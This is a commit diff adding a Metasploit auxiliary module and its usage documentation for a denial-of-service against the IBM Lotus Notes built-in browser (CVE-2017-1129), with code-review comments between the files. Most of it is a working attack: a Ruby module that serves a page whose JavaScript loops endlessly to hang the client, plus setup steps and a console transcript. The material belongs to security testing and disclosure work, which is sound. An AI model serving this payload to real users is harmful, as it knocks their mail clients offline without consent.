Land #8989, IBM Lotus Notes DoS (CVE-2017-1129)
commit a3d47ea838
@ -0,0 +1,63 @@
## Vulnerable Application

This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.

JavaScript is used to create an object instance of encode URI within an infinite loop,
leading to a Denial of Service of the IBM Lotus Notes app itself.

Vulnerable app versions include:
* IBM Notes 9.0.1 to 9.0.1 FP8IF1
* IBM Notes 9.0 to 9.0 IF4.
* IBM Notes 8.5.3 to 8.5.3 FP6 IF13.
* IBM Notes 8.5.2 to 8.5.2 FP4 IF3.
* IBM Notes 8.5.1. to 8.5.1 FP5 IF5.
* IBM Notes 8.5 release

Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385

## Verification

1. Start msfconsole
1. `use auxiliary/dos/http/ibm_lotus_notes.rb`
1. Set `SRVHOST`
1. Set `SRVPORT`
1. run (Server started)
1. Visit server URL in the built-in web-browser of IBM Notes client application

## Scenarios

```
msf > use auxiliary/dos/http/ibm_lotus_notes
msf auxiliary(ibm_lotus_notes) > show options

Module options (auxiliary/dos/http/ibm_lotus_notes):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)


Auxiliary action:

Name Description
---- -----------
WebServer


msf auxiliary(ibm_lotus_notes) > set SRVHOST 192.168.0.50
SRVHOST => 192.168.0.50
msf auxiliary(ibm_lotus_notes) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes) > run
[*] Auxiliary module execution completed
msf auxiliary(ibm_lotus_notes) >
[*] Using URL: http://192.168.0.50:9092/ImlbHZVXlvTEXYd
[*] Server started.
msf auxiliary(ibm_lotus_notes) >
```

At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive.
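Review bot: Verification step 2 gives the module path as `use auxiliary/dos/http/ibm_lotus_notes.rb`, while the Scenarios transcript loads it as `use auxiliary/dos/http/ibm_lotus_notes`; drop the `.rb` suffix so the step matches the transcript. In the version list, `8.5.1.` has a stray period and the bullets end inconsistently (some with a period, some without). The description's "object instance of encode URI" would read more clearly as `encodeURI`, the spelling the module title uses. Since the doc only links the IBM bulletin, a sentence saying that the fixed versions are listed there would help readers judge their exposure.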
@ -0,0 +1,59 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer

def initialize(info = {})
super(
update_info(
info,
'Name' => "IBM Notes encodeURI DOS",
'Description' => %q(
This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
If successful, it could cause the Notes client to hang and have to be restarted.
),
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra',
],
'References' => [
[ 'EXPLOIT-DB', '42602'],
[ 'CVE', '2017-1129' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
],
'DisclosureDate' => 'Aug 31 2017',
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end

def run
exploit # start http server
end

def setup
@html = %|
<html><head><title>DOS</title>
<script type="text/javascript">
while (true) try {
var object = { };
function d(d0) {
var d0 = (object instanceof encodeURI)('foo');
}
d(75);
} catch (d) { }
</script>
</head></html>
|
end

def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)
end
end
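Review bot: `setup` is overridden to build `@html` but never calls `super`, so whatever setup the parent class or the `HttpServer` mixin performs would be skipped; call `super` at the top of `setup`, or build the page inside `on_request_uri` instead. In the embedded script, `function d(d0)` immediately redeclares its parameter with `var d0` and the `75` passed in `d(75)` is never used, so the parameter and argument can be dropped. `print_status('Sending response')` in `on_request_uri` does not say which client was served; including the peer address would make the console log useful when more than one client connects.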